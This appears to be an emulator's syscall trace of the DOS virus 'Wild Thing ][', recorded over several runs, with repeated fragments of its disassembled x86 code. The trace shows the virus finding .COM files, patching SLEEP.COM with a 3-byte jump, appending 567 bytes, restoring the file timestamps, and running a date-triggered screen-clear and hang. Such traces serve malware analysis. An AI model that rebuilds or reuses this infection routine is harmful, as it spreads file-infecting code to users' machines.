2018-12-25T12:42:08.729413503Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.731511779Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.737635808Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.738938126Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.744471211Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.750910798Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.752812279Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.75732857Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.765791078Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.7732544Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.775411778Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.780163195Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.781384979Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.783933929Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.78538792Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.791723716Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.793466437Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.799030768Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.810411508Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.81410279Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.820870689Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.832000057Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.845678883Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.848026026Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.855792118Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.858094981Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.867165422Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.878427003Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.881494141Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:08.887557609Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:08.889532522Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:08.890821384Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:08.900830242Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:08.117654515Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:08.121072983Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:08.123309567Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:08.126110565Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:08.128503943Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:08.135109226Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:08.143071825Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:08.155315428Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:08.170780656Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:08.177378012Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:08.178748413Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:08.199383217Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:08.200766773Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:08.203236569Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.206416289Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:08.214597777Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:08.216215381Z 62 PC: 12bfc | Close file
2018-12-25T12:42:08.22433761Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:08.230797888Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.232656124Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.23689751Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.247113101Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.258539891Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.260531665Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.267093947Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.26850512Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.272571738Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.274632564Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.281391204Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.283383778Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.291407414Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.311408558Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.314338673Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.320229398Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.330443742Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.337967548Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.339626421Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.346400279Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.347845895Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.350745961Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.352588429Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.361557179Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.364628348Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.372791753Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.383200054Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.387499177Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.393750063Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.404694843Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.412890362Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.414868647Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.421842921Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.42460512Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.427996361Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.430076058Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.439060809Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.441400312Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.449267391Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.460005352Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.46314535Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.46971792Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.479825264Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.487128019Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.488973753Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.495748022Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.4976335Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.500192962Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.50197889Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.510316495Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.51200099Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.520511322Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.530931468Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.534712303Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.540406003Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.550670332Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.557417832Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.55910224Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.565909048Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.567578478Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.570673624Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.573397575Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.582388843Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.584124259Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.592748132Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.603424596Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.606264438Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.613005909Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.623308563Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.629816022Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.632211672Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.638457167Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.639679547Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.642744902Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.644242355Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.652424017Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.655374715Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.662959778Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.673150137Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.676777541Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.682689994Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.692753601Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.70036495Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.702101539Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.708692846Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.711396203Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.718583307Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.731195619Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.735064261Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:08.73934687Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:08.741036986Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:08.7428384Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:08.752853871Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:08.776305428Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:08.777922854Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:08.780414549Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:08.783357756Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:08.785799478Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:08.791888676Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:08.802505059Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:08.808757534Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:08.824863493Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:08.831274318Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:08.832588944Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:08.857663234Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:08.859333134Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:08.86208083Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.864808534Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:08.873314781Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:08.874841635Z 62 PC: 12bfc | Close file
2018-12-25T12:42:08.882930833Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:08.892799726Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.896124799Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.914779786Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.927245574Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.938336296Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.93997974Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.947616624Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.949254176Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.952377566Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.96432288Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.972612151Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.974368981Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.98430317Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.994165054Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.996990029Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.004127379Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.014009927Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.035554657Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.038162475Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.04450852Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.045965697Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.04956879Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.051251906Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.059334684Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.061604836Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.07301515Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.083008626Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.086153848Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.091692544Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.101774807Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.109002673Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.111062381Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.117520632Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.119088817Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.122785355Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.124723101Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.134642836Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.141316511Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.14888778Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.160715319Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.16397593Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.169911318Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.17985897Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.187292429Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.188913594Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.19536297Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.197439826Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.200751213Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.202665388Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.211695625Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.213122242Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.223339493Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.235191036Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.237654554Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.243057992Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.253698005Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.261205773Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.262593718Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.269567092Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.271126983Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.273893256Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.276348973Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.285215836Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.28677787Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.295628402Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.305445531Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.307915941Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.314365292Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.324110902Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.330547196Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.332686475Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.339204223Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.341195137Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.344243062Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.346220185Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.354226852Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.356754661Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.364588219Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.37437554Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.377472841Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.38365326Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.39329634Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.400214425Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.401907743Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.40827451Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.410075505Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.420615769Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.430938302Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.433484016Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:09.438104778Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:09.440043037Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:09.441344182Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:09.44977721Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:09.014988109Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:09.017639153Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:09.021823711Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:09.02466579Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:09.027683877Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:09.033944826Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:09.045618793Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:09.057565586Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:09.074226099Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:09.081027838Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:09.082633744Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:09.091139459Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:09.093086304Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:09.095909583Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.100862426Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:09.109117582Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:09.110917702Z 62 PC: 12bfc | Close file
2018-12-25T12:42:09.119460889Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:09.130836178Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.133449439Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.13965116Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.163142995Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.169760501Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.171111306Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.178254435Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.179907979Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.182778995Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.185507147Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.194127114Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.195830882Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.204052528Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.214068526Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.217132006Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.223931877Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.233553721Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.24037284Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.243072063Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.249988629Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.25162492Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.254845263Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.256529967Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.264915846Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.267279792Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.274734715Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.285032044Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.287729501Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.29387998Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.303349388Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.314713361Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.316867447Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.323630639Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.324926433Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.328948852Z 66 PC: 12c12 | Move file pointer (See above)
